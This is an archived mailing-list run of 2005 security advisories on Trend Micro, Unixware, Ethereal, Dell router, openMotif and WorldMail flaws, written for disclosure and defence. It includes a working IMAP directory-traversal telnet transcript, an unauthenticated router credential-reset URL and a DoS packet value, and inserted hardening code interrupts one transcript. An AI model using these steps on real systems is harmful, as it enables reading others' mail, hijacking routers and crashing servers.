December 14, 2005

I. BACKGROUND

Trend Micro PC-Cillin Internet Security is antivirus protection software
for home and business use. It provides complete protection, detection
and elimination of thousands of computer viruses, worms, and Trojan
Horse programs.

II. DESCRIPTION

Local exploitation of an insecure permission vulnerability in multiple
Trend Micro Inc. products allows attackers to escalate privileges or
disable protection.

The vulnerabilities specifically exist in the default Access Control
List (ACL) settings that are applied during installation. When an
administrator installs an affected Trend Micro product, the default ACL
allows any user to modify the installed files. Due to the fact that some
of the programs run as system services, a user could replace an
installed Trend Micro product file with their own malicious code, and
the code would be executed with system privileges.

III. ANALYSIS

Successful exploitation allows local attackers to escalate privileges to
the system level. It is also possible to use this vulnerability to
simply disable protection by moving all of the executable files so that
they cannot start upon a reboot. Once disabled, the products are no
longer able to provide threat mitigation, thus opening the machine up to
attack.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Trend
Micro PC-Cillin Internet Security 2005 version 12.00 build 1244. It is
suspected that previous versions are also vulnerable. It has been
reported that InterScan VirusWall, InterScan eManager and Office Scan
are also vulnerable.

V. WORKAROUND

Apply proper Access Control List settings to the directory that the
affected Trend Micro product is installed in. The ACL rules should be set so
that no regular users can modify files in the directory.

VI. VENDOR RESPONSE

"Trend Micro has become aware of a vulnerability related to PC-cillin
12. PC-cillin 12 does not work correctly when the configuration file and
the registry are erased intentionally.

We will release PC-cillin 12.4 on December 14, 2005 via the AU server. This
release will include a short-term solution of changing the ACL to User
authority for the configuration file and registry.

And

We will create a tool for changing the ACL to User authority for the
configuration file and registry.

This tool can be used for both PC-cillin 12 and PC-cillin 14 as the same
program."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3360 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/27/2005 Initial vendor notification
10/27/2005 Initial vendor response
12/14/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



iDefense Security Advisory 12.14.05: Trend Micro ServerProtect Crystal Reports ReportServer File Disclosure

2005-12-14 Thread [EMAIL PROTECTED]


Trend Micro ServerProtect Crystal Reports ReportServer File Disclosure

iDefense Security Advisory 12.14.05
www.idefense.com/application/poi/display?id=352&type=vulnerabilities
December 14, 2005

I. BACKGROUND

Trend Micro Inc.'s ServerProtect provides antivirus scanning with
centralized management of virus outbreaks, scanning, pattern file
updates, notifications and remote installations. More information about
the product set is available at:

www.trendmicro.com/en/products/file-server/sp/evaluate/overview.htm

II. DESCRIPTION

Remote exploitation of an input validation vulnerability in Trend Micro
Inc.'s ServerProtect Management Console allows remote attackers to view
the contents of arbitrary files on the underlying system.

The problem specifically exists within the handling of the IMAGE
parameter in the script rptserver.asp. The vulnerable area of code is
outlined in the following snippet:

Set session("oEMF") = Server.CreateObject("CREmfgen.CREmfgen.2")
Call ParseQS()
if IMAGE <> "" then
 Call session("oEMF").StreamImage(IMAGE, DEL)
 Response.End
end if

An attacker can utilize directory traversal modifiers to traverse
outside the system temporary directory and access any file on the same
volume.

III. ANALYSIS

Successful exploitation of the described vulnerability allows remote
attackers to view the contents of arbitrary files on the underlying
system. Exploitation does not require credentials, which exacerbates
the impact of this vulnerability.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Trend
Micro ServerProtect for Windows Management Console 5.58 running with
Trend Micro Control Manager 2.5/3.0 and Trend Micro Damage Cleanup
Server 1.1. It is suspected that earlier versions and versions for other
platforms are vulnerable as well.

V. WORKAROUND

Employ firewalls, access control lists or other TCP/UDP restriction
mechanisms to limit access to the vulnerable system on the configured
port, generally TCP port 80.

VI. VENDOR RESPONSE

"Trend Micro has become aware of a vulnerability related to Crystal
Report, a reporting component found in Trend Micro Control Manager (v2.5
and v3.0). Under certain conditions, arbitrary files on the
ReportServer volume inside Trend Micro Control Manager software could be
viewed or accessed remotely. Trend Micro is currently consulting with
Crystal Report regarding permanent solutions to this reporting
component. A temporary workaround solution can be recommended through
contacting Trend Micro customer and technical support."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-1930 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

06/03/2005 Initial vendor notification
06/06/2005 Initial vendor response
12/14/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com



iDefense Security Advisory 12.14.05: Trend Micro ServerProtect EarthAgent Remote DoS Vulnerability

2005-12-14 Thread [EMAIL PROTECTED]

Trend Micro ServerProtect EarthAgent Remote DoS Vulnerability

iDefense Security Advisory 12.14.05
www.idefense.com/application/poi/display?id=356&type=vulnerabilities
December 14, 2005

I. BACKGROUND

Trend Micro Inc.'s ServerProtect provides antivirus scanning with
centralized management of virus outbreaks, scanning, pattern file
updates, notifications and remote installations. More information about
the product set is available at:

www.trendmicro.com/en/products/file-server/sp/evaluate/overview.htm

II. DESCRIPTION

Remote exploitation of a denial of service vulnerability in Trend Micro
Inc.'s ServerProtect EarthAgent daemon allows attackers to cause the
target process to consume 100% of available CPU resources.

The problem specifically exists within ServerProtect EarthAgent in the
handling of maliciously crafted packets transmitted with the magic value
"\x21\x43\x65\x87" targeting TCP port 5005. A memory leak also occurs
with each received exploit packet, allowing an attacker to exhaust all
available memory with repeated attacks.

III. ANALYSIS

Successful exploitation of the described vulnerability allows
unauthenticated remote attackers to consume 100% of CPU resources,
progressively consume memory and potentially crash the underlying
operating system. Full CPU utilization can be achieved with a single
packet; memory consumption grows incrementally with each subsequent
attack packet.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Trend
Micro ServerProtect for Windows Management Console 5.58 running with
Trend Micro Control Manager 2.5/3.0 and Trend Micro Damage Cleanup
Server 1.1. It is suspected that earlier versions and versions for other
platforms are vulnerable as well.

V. WORKAROUND

Employ firewalls, access control lists or other TCP/UDP restriction
mechanisms to limit access to vulnerable systems on TCP port 5005.

VI. VENDOR RESPONSE

The vendor has released the following security advisory for this issue:

http://kb.trendmicro.com/solutions/search/main/search/solutionDetail.asp?solutionID=25254

"Contact Trend Micro Technical Support to request the
SPNT5.58_HotfixB1137.zip file, which should only be installed on servers
running SPNT 5.58."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-1928 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

06/03/2005 Initial vendor notification
06/05/2005 Initial vendor response
12/14/2005 Public disclosure

IX. CREDIT

This vulnerability was discovered by Pedram Amini, OpenRCE
(www.openrce.org).

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com




iDefense Security Advisory 12.14.05: Trend Micro ServerProtect relay.dll Chunked Overflow Vulnerability

2005-12-14 Thread [EMAIL PROTECTED]


iDefense Security Advisory 12.14.05: Trend Micro ServerProtect isaNVWRequest.dll Chunked Overflow

2005-12-14 Thread [EMAIL PROTECTED]


iDEFENSE Security Advisory 12.12.05: SCO Unixware Setuid 'uidadmin' Scheme Buffer Overflow Vulnerability

2005-12-12 Thread [EMAIL PROTECTED]

SCO Unixware Setuid 'uidadmin' Scheme Buffer Overflow Vulnerability

iDefense Security Advisory 12.12.05

www.iDefense.com/application/poi/display?id=350&type=vulnerabilities
December 12, 2005

I. BACKGROUND

SCO Unixware is a Unix operating system that runs on many OEM platforms.

II. DESCRIPTION

Local exploitation of a buffer overflow vulnerability in the uidadmin
binary included in multiple versions of The SCO Group Inc.'s Unixware
allows attackers to gain root privileges.

The vulnerability specifically exists because of a failure to check the
length of user specified file input. If the user prepares a file longer
than 1,600 bytes and supplies the path to that file using the "-S"
option of uidadmin, a stack based buffer overflow occurs. This leads to
the execution of arbitrary code with root privileges, as uidadmin is
setuid root by default.

III. ANALYSIS

Successful exploitation of this vulnerability requires that a user have
local access to the system. This would allow the user to gain super user
privileges.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in SCO
Unixware versions 7.1.3 and 7.1.4. All previous versions of SCO Unixware
are suspected to be vulnerable.

V. WORKAROUND

Remove the setuid bit from the uidadmin binary:

 chmod u-s /unixware/usr/bin/uidadmin

VI. VENDOR RESPONSE

The vendor has released the following update to address this
vulnerability:

 ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.54

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3903 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/13/2005  Initial vendor response
12/12/2005  Coordinated public disclosure

IX. CREDIT

iDefense Labs is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com



iDefense Security Advisory 12.09.05: Ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability

2005-12-09 Thread [EMAIL PROTECTED]

Ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability

iDefense Security Advisory 12.09.05
www.idefense.com/application/poi/display?id=349&type=vulnerabilities
December 9, 2005

I. BACKGROUND

Ethereal is a full featured open source network protocol analyzer.

For more information, see http://www.ethereal.com/

II. DESCRIPTION

Remote exploitation of an input validation vulnerability in the OSPF
protocol dissector within Ethereal, as included in various vendors'
operating system distributions, could allow attackers to crash the
vulnerable process or potentially execute arbitrary code.

The affected Ethereal component is used to analyse Open Shortest Path
First (OSPF) Interior Gateway Protocol (IGP), as specified in RFC-2178.

The vulnerability specifically exists because no bounds checking is
performed in the dissect_ospf_v3_address_prefix() function. This
function takes user-supplied binary data and attempts to convert it into
a human readable string. It uses a fixed length buffer on the stack to
store the constructed string but performs no check on the length of the
input. If the output generated from the input exceeds the size of the
buffer, a stack-based overflow occurs.
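
The bounded rendering a hardened dissector should use, as an added example in C that is not Ethereal's code: the output buffer is sized from the protocol maximum (an OSPFv3 prefix is at most 128 bits, so 16 bytes and 47 rendered characters) rather than from whatever the packet claims, and the claimed prefix length, the bytes actually present and the output size are all checked before a byte is written. The prefix-length-in-bits layout is the standard OSPFv3 one; the sample packet bytes are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* OSPFv3 address prefixes carry a length in bits (0..128). The longest
 * "xx:xx:...:xx" rendering of 16 bytes is 16*3 - 1 = 47 characters plus
 * the terminator, so the buffer is sized from the protocol maximum. */
#define OSPFV3_MAX_PREFIX_BITS  128
#define OSPFV3_MAX_PREFIX_BYTES (OSPFV3_MAX_PREFIX_BITS / 8)
#define PREFIX_STR_SIZE         (OSPFV3_MAX_PREFIX_BYTES * 3)

enum prefix_status {
    PREFIX_OK = 0,
    PREFIX_BAD_LENGTH = -1,   /* claimed prefix length exceeds 128 bits */
    PREFIX_TRUNCATED = -2,    /* packet ends before the prefix does */
    PREFIX_NO_ROOM = -3       /* output buffer too small for the rendering */
};

/* Bytes needed to hold prefix_bits bits. */
static size_t prefix_bytes(unsigned prefix_bits)
{
    return (prefix_bits + 7u) / 8u;
}

/* Render the prefix as colon-separated hex into out (size outsz). Every
 * bound is verified before anything is written, so a hostile prefix length
 * can only yield an error, never a write past the end of out. */
static enum prefix_status render_ospfv3_prefix(unsigned prefix_bits,
                                               const uint8_t *data, size_t avail,
                                               char *out, size_t outsz)
{
    if (prefix_bits > OSPFV3_MAX_PREFIX_BITS)
        return PREFIX_BAD_LENGTH;
    size_t n = prefix_bytes(prefix_bits);
    if (n > avail)
        return PREFIX_TRUNCATED;
    size_t needed = (n == 0) ? 1 : n * 3;      /* hex pairs, separators, NUL */
    if (needed > outsz)
        return PREFIX_NO_ROOM;

    size_t used = 0;
    for (size_t i = 0; i < n; i++) {
        int w = snprintf(out + used, outsz - used, i ? ":%02x" : "%02x", data[i]);
        if (w < 0 || (size_t)w >= outsz - used)
            return PREFIX_NO_ROOM;             /* unreachable after the check above */
        used += (size_t)w;
    }
    out[used] = '\0';
    return PREFIX_OK;
}

/* Constructed sample: the first 4 bytes of 2001:db8::/32 as carried in a packet. */
static const uint8_t sample_prefix[4] = { 0x20, 0x01, 0x0d, 0xb8 };

/* Convenience wrapper: rendering in a static buffer, or NULL on any error. */
static const char *render_or_null(unsigned prefix_bits, const uint8_t *data, size_t avail)
{
    static char buf[PREFIX_STR_SIZE];
    return render_ospfv3_prefix(prefix_bits, data, avail, buf, sizeof buf) == PREFIX_OK
           ? buf : NULL;
}

int main(void)
{
    char buf[PREFIX_STR_SIZE];
    printf("32-bit prefix  -> %s\n", render_or_null(32, sample_prefix, sizeof sample_prefix));
    printf("255-bit claim  -> status %d\n",
           render_ospfv3_prefix(255, sample_prefix, sizeof sample_prefix, buf, sizeof buf));
    printf("128-bit claim, 4 bytes present -> status %d\n",
           render_ospfv3_prefix(128, sample_prefix, sizeof sample_prefix, buf, sizeof buf));
    return 0;
}
```

The two status codes a dissector will see in practice from malformed input are PREFIX_BAD_LENGTH and PREFIX_TRUNCATED; PREFIX_NO_ROOM can only occur if a caller passes a buffer smaller than PREFIX_STR_SIZE, which is the mistake the advisory describes.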

III. ANALYSIS

Successful exploitation allows remote attackers to perform a DoS against
a running instance of Ethereal and may, under certain conditions,
allow the execution of arbitrary code. As the overflow string is
generated by a format string converting binary values into their
hexadecimal (base 16) character equivalents, it can contain only a
limited subset of all possible characters, and the length of an overflow
can only be controlled to within three characters. This may prevent
exploitability on some platforms; on others these constraints may not
be enough to prevent exploitation.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in the
ethereal-0.10.12 RPM from Red Hat Fedora Core 3. It is suspected that
previous versions containing the OSPF dissector code are also
vulnerable.

V. WORKAROUND

Disable the OSPF packet dissector in Ethereal by performing the
following actions as the user invoking Ethereal, typically root.

Create the .ethereal directory:

# mkdir ~/.ethereal

You can safely ignore the following error:

mkdir: cannot create directory '/root/.ethereal': File exists

Add the OSPF dissector to the list of protocols to ignore.

# echo ospf >> ~/.ethereal/disabled_protos

This workaround will prevent Ethereal from parsing the contents of OSPF
packets, which prevents exposure to the vulnerability.

VI. VENDOR RESPONSE

A source patch is available from the main ethereal SVN Repository:

http://anonsvn.ethereal.com/viewcvs/viewcvs.py/trunk/epan/dissectors/packet-ospf.c?rev=16507&view=markup

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3651 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/14/2005 Initial vendor notification
11/14/2005 Initial vendor response
12/09/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com



iDefense Security Advisory 12.07.05: Dell TrueMobile 2300 Wireless Broadband Router Authentication Bypass Vulnerability

2005-12-08 Thread [EMAIL PROTECTED]

Dell TrueMobile 2300 Wireless Broadband Router Authentication Bypass Vulnerability

iDefense Security Advisory 12.07.05
www.idefense.com/application/poi/display?id=348&type=vulnerabilities
December 7, 2005

I. BACKGROUND

The Dell TrueMobile 2300 Wireless Broadband Router is an 802.11b/g
wireless access point, wired ethernet switch and internet router. More
information can be found at the following URL:

http://support.dell.com/support/edocs/network/p57205/en/intro/index.htm

II. DESCRIPTION

Remote exploitation of a design error in Dell Inc.'s TrueMobile 2300
Wireless Router may allow an attacker to reset the authentication
credentials.

The Dell TrueMobile 2300 is a wireless router and access point. By
requesting the following URL from the router, it is possible to obtain
a page containing a form which allows you to reset the authentication
credentials. (The IP is typically 192.168.2.1, and [ROUTER IP] should
be replaced by the router's actual address.)

http://[ROUTER IP]/apply.cgi?Page=adv_password.asp&action=ClearLog

Although dialog boxes for entering the username and password appear,
pressing cancel will not prevent this exploit from working.

III. ANALYSIS

Exploitation could allow remote attackers to associate with the
internal side of the router to change any configuration settings,
including uploading of new firmware.

The precise cause of the error is unknown. Although there is GPL
source code available for this product, the firmware's source code
version has not been kept up to date with the binary version. As a
result, it does not directly allow the cause of the vulnerability to
be determined.

Based on analysis of the affected binary, /usr/sbin/httpd, and the
previous version of the source code it appears the cause is a logic
error involving the 'ClearLog' string being checked without first
ascertaining that the page was one where that made sense. Although
the binary appears to be largely the same code as the available source
code, there are many differences. In the binary version, the
authentication is not performed in the same order as in the source
version. It is likely that the determination of which pages to check
is now done on the basis of the 'action' variable, rather than the
previous method of using the page name.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in the
following Dell TrueMobile 2300 firmware versions:

• 3.0.0.8, dated 07/24/2003
• 5.1.1.6, dated 1/31/2004

Previous versions may also be affected; however, it is not clear in
which version the vulnerability was introduced.

V. WORKAROUND

In order to mitigate exposure to this vulnerability from remote
attackers, employ encryption on your wireless interface, or disable it
if it is not required. The exact settings to use are dependent on your
wireless security policy. This workaround does not prevent exploitation
from the local network via wired interfaces.

VI. VENDOR RESPONSE

"The vendor is no longer selling this product and has replaced it with
newer models that do not exhibit the defect. Therefore, a patch will not
be released to address this issue."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3661 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/17/2005 Initial vendor notification
11/18/2005 Initial vendor response
12/07/2005 Public disclosure

IX. CREDIT

TNull is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com




[xfocus-SD-051202]openMotif libUil Multiple vulnerability

2005-12-02 Thread [EMAIL PROTECTED]

Title: [xfocus-SD-051202] openMotif libUil Multiple Vulnerabilities

Affected version: openmotif 2.2.3 (2.2.4 was not obtained, so it was not
tested)
Product: http://www.motifzone.net/

xfocus (http://www.xfocus.org) has discovered multiple vulnerabilities in
the openmotif libUil library. Details follow:

1: libUil.so diag_issue_diagnostic buffer overflow

Clients/uil/UilDiags.c
diag_issue_diagnostic()

202 void    diag_issue_diagnostic
203     ( int d_message_number, src_source_record_type *az_src_rec,
204       int l_start_column, ...)
205
206 {
207     va_list ap;                 /* ptr to variable length parameter */
208     int severity;               /* severity of message */
209     int message_number;         /* message number */
210     char msg_buffer[132];       /* buffer to construct message */
211     char ptr_buffer[buf_size];  /* buffer to construct pointer */
212     char loc_buffer[132];       /* buffer to construct location */
213     char src_buffer[buf_size];  /* buffer to hold source line */
..
293     va_start(ap, l_start_column);
294
295 #ifndef NO_MESSAGE_CATALOG
296 [1.1]   vsprintf( msg_buffer,
297             catgets(uil_catd, UIL_SET1, msg_cat_table[ message_number ],
298                     diag_rz_msg_table[ message_number ].ac_text),
299             ap );
300 #else
301 [1.2]   vsprintf( msg_buffer,
302             diag_rz_msg_table[ message_number ].ac_text,
303             ap );
304 #endif
305     va_end(ap);

The vsprintf() calls at [1.1] and [1.2] write into the fixed 132-byte
msg_buffer without any length limit, so they overflow it when the
arguments in ap are user-supplied data. Any local or remote application
that uses this library may therefore be made to execute arbitrary code.

2: libUil.so open_source_file buffer overflow

Clients/uil/UilSrcSrc.c

620 status
621 open_source_file( XmConst char           *c_file_name,
622                   uil_fcb_type           *az_fcb,
623                   src_source_buffer_type *az_source_buffer )
624 {
625
626     static unsigned short   main_dir_len = 0;
627     boolean                 main_file;
628     int                     i;          /* loop index through include files */
629     char                    buffer[256];
630
631
632     /* place the file name in the expanded_name buffer */
633
634 [2.1]   strcpy(buffer, c_file_name);
635
636     /* Determine if this is the main file or an include file. */
637
638     main_file = (main_fcb == NULL);
639
639
[2.1] The strcpy() into the fixed 256-byte buffer has the same problem as
above: a file name longer than 255 bytes overflows it.
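
Added example, not openMotif code, showing the bounded replacements for the calls marked [1.1], [1.2] and [2.1]: vsnprintf() with truncation detection in place of vsprintf(), and a length check before the copy in place of strcpy(). The buffer sizes match the declarations quoted above; the message and file name inputs are constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define MSG_BUF_SIZE  132   /* same size as msg_buffer in diag_issue_diagnostic */
#define NAME_BUF_SIZE 256   /* same size as buffer in open_source_file */

/* Length of s counting at most limit bytes (portable stand-in for strnlen). */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Bounded stand-in for the vsprintf() at [1.1]/[1.2]. Returns 0 when the
 * message fit, 1 when it had to be truncated, -1 on a formatting error.
 * vsnprintf never writes more than bufsz bytes, so an oversized argument
 * can at worst lose its tail instead of smashing the stack. */
static int format_diagnostic(char *msg_buffer, size_t bufsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(msg_buffer, bufsz, fmt, ap);
    va_end(ap);
    if (n < 0) {
        msg_buffer[0] = '\0';
        return -1;
    }
    return (size_t)n >= bufsz ? 1 : 0;
}

/* Bounded stand-in for the strcpy() at [2.1]. A file name that does not fit
 * together with its terminator is rejected rather than copied. */
static int copy_file_name(char *buffer, size_t bufsz, const char *c_file_name)
{
    size_t len = bounded_len(c_file_name, bufsz);
    if (len >= bufsz)
        return -1;
    memcpy(buffer, c_file_name, len + 1);
    return 0;
}

/* Constructed input: a 399-byte argument, far beyond the 132-byte buffer.
 * Returns 1 when the result was flagged truncated and fills the buffer exactly. */
static int demo_long_message(void)
{
    char big[400];
    char msg[MSG_BUF_SIZE];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    int rc = format_diagnostic(msg, sizeof msg, "error at line %d: %s", 42, big);
    return (rc == 1 && strlen(msg) == MSG_BUF_SIZE - 1) ? 1 : 0;
}

/* Constructed input that fits; returns the formatted length or -1. */
static int demo_short_message_len(void)
{
    char msg[MSG_BUF_SIZE];
    if (format_diagnostic(msg, sizeof msg, "error at line %d: %s", 42, "bad token") != 0)
        return -1;
    return (int)strlen(msg);
}

/* Constructed 305-byte file name; returns -1 because it is rejected. */
static int demo_long_file_name(void)
{
    char big[NAME_BUF_SIZE + 50];
    char buffer[NAME_BUF_SIZE];
    memset(big, 'B', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return copy_file_name(buffer, sizeof buffer, big);
}

int main(void)
{
    printf("long message truncated cleanly: %d\n", demo_long_message());
    printf("short message length: %d\n", demo_short_message_len());
    printf("oversized file name rejected: %d\n", demo_long_file_name());
    return 0;
}
```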

--EOF


iDEFENSE Security Advisory 11.17.05: Qualcomm WorldMail IMAP Server Directory Traversal Vulnerability

2005-11-17 Thread [EMAIL PROTECTED]

Qualcomm WorldMail IMAP Server Directory Traversal Vulnerability

iDEFENSE Security Advisory 11.17.05
www.idefense.com/application/poi/display?id=341&type=vulnerabilities
November 17, 2005

I. BACKGROUND

Qualcomm WorldMail is an email and messaging server designed for use
in small to large enterprises that supports IMAP, POP3, SMTP, and web
mail features.

More information can be found on the vendor's site:

 http://www.eudora.com/worldmail/

II. DESCRIPTION

Remote exploitation of a directory traversal vulnerability in Qualcomm
WorldMail IMAP Server allows attackers to read any email stored on the
system.

The IMAP protocol supports the use of multiple folders and contains
commands which allow users to specify folder paths. Qualcomm WorldMail
server allows multiple commands to specify folders outside of the
current user's mailbox.

Attackers can leverage this vulnerability to view and manage any other
user's email messages stored on the system. Attackers also have the
ability to move any arbitrary folder on the system.

Exploitation is trivial and can be done with a simple telnet client.
Below is an example transaction highlighting the attack:

---
c:\> telnet 192.168.0.109 143

* OK WorldMail IMAP4 Server 6.1.19.0 ready
1 login user1 user1
1 OK LOGIN completed

2 select /inbox
* 0 EXISTS
* OK [UNSEEN 0]
2 OK [READ-WRITE] opened /inbox

2 select ./../../administrator/inbox
* 1 EXISTS
* OK [UNSEEN 1] Message 1 is first unseen
2 OK [READ-WRITE] opened ./../../administrator/inbox

2 fetch 1 (RFC822.TEXT)
* 1 FETCH (RFC822.TEXT {131}

this message was sent to administrator
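
Both this advisory and the Trend Micro ServerProtect rptserver.asp advisory above come down to the same missing check: a client-supplied name is used as a path without first being confined to the directory (or mailbox root) it may legitimately name. The following is an added example in C, not code from either product, of a lexical normaliser that rejects any path which climbs above its base; both '/' and '\' are treated as separators because the affected products run on Windows, and the sample inputs are constructed to mirror the two advisories.

```c
#include <stdio.h>
#include <string.h>

#define MAX_SEGMENTS 64

/* Lexically normalise a client-supplied relative path and confine it to a
 * base directory. Returns 1 and writes the normalised path (segments
 * joined with '/') to out when the path stays inside the base; returns 0
 * when it is absolute, names a drive, climbs above the base with "..", or
 * does not fit. The caller must URL-decode before calling, and should
 * join the result onto the base directory only after this check. */
static int confine_relative_path(const char *user_path, char *out, size_t outsz)
{
    const char *seg[MAX_SEGMENTS];
    size_t seglen[MAX_SEGMENTS];
    int depth = 0;
    const char *p = user_path;

    if (outsz == 0)
        return 0;
    if (*p == '/' || *p == '\\' || (p[0] != '\0' && p[1] == ':'))
        return 0;                               /* absolute or drive-qualified */

    while (*p) {
        const char *start = p;
        while (*p && *p != '/' && *p != '\\')
            p++;
        size_t n = (size_t)(p - start);
        if (*p)
            p++;                                /* step over the separator */
        if (n == 0 || (n == 1 && start[0] == '.'))
            continue;                           /* "" and "." change nothing */
        if (n == 2 && start[0] == '.' && start[1] == '.') {
            if (depth == 0)
                return 0;                       /* would leave the base */
            depth--;
            continue;
        }
        if (depth == MAX_SEGMENTS)
            return 0;
        seg[depth] = start;
        seglen[depth] = n;
        depth++;
    }

    size_t used = 0;
    for (int i = 0; i < depth; i++) {
        if (used + (i ? 1 : 0) + seglen[i] + 1 > outsz)
            return 0;
        if (i)
            out[used++] = '/';
        memcpy(out + used, seg[i], seglen[i]);
        used += seglen[i];
    }
    out[used] = '\0';
    return 1;
}

/* Convenience wrapper: normalised path in a static buffer, or NULL if rejected. */
static const char *confine_or_null(const char *user_path)
{
    static char buf[260];
    return confine_relative_path(user_path, buf, sizeof buf) ? buf : NULL;
}

int main(void)
{
    /* Constructed inputs modelled on the IMAGE parameter and mailbox names above. */
    const char *samples[] = {
        "report1.emf", "..\\..\\boot.ini", "sub/../other.emf",
        "inbox", "./../../administrator/inbox"
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        const char *r = confine_or_null(samples[i]);
        printf("%-32s -> %s\n", samples[i], r ? r : "REJECTED");
    }
    return 0;
}
```

A purely lexical check is sufficient only when the base directory contains no symbolic links or reparse points that themselves lead outside it; where that cannot be guaranteed, resolve the joined path with the platform's canonicalisation call and compare the result against the base as well.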


III. ANALYSIS

Successful exploitation of this vulnerability allows attackers to view
and delete mail from any user on the system. Attackers may also be able
to affect system stability with the ability to move arbitrary folders on
the affected system.

This is a post authentication exploit. In order to exploit this
vulnerability an attacker would need a valid login to the email server
and the IMAP module would have to be enabled (default).

IV. DETECTION

This exploit was tested against Qualcomm Worldmail server version 3.0.
Other versions may be vulnerable.

V. WORKAROUND

As the affected commands cannot be disabled, it is important that only
trusted users be allowed to access the vulnerable mail server.
Exploitation of this vulnerability can only be done after a user is
authenticated to the mail server. Therefore, it is recommended that
login credentials be reviewed to ensure that only trusted users have
access.

WorldMail also supports POP access to email. If disabling the IMAP
service completely is an option, this will also prevent exploitation of
the vulnerability.

VI. VENDOR RESPONSE

Multiple attempts have been made to inform the vendor of this
vulnerability but to date a response has not yet been received.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3189 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/27/2005  Initial vendor response
11/17/2005  Public disclosure

IX. CREDIT

The vulnerability was discovered by FistFuXXer.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com





iDEFENSE Security Advisory 11.15.05: Multiple Vendor Insecure Call to CreateProcess() Vulnerability

2005-11-15 Thread [EMAIL PROTECTED]
ing into the problem, and it seems that this is
not present in the current version of KAV for File Servers."

Microsoft:

"Microsoft has confirmed that the Beta 2 version of its Antispyware
product, targeted for release later this year, will address the issue
reported by iDEFENSE."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
following names to this issue.

RealNetworks RealPlayer 10.5
 CAN-2005-2936

Kaspersky Anti-Virus 5.0
 CAN-2005-2937

Apple iTunes 4.7.1.30
 CAN-2005-2938

VMWare Workstation 5.0.0 build-13124
 CAN-2005-2939

Microsoft Antispyware 1.0.509 (Beta 1)
 CAN-2005-2940

These are candidates for inclusion in the CVE list
(http://cve.mitre.org), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

09/19/2005  Initial vendor notification
11/15/2005  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com




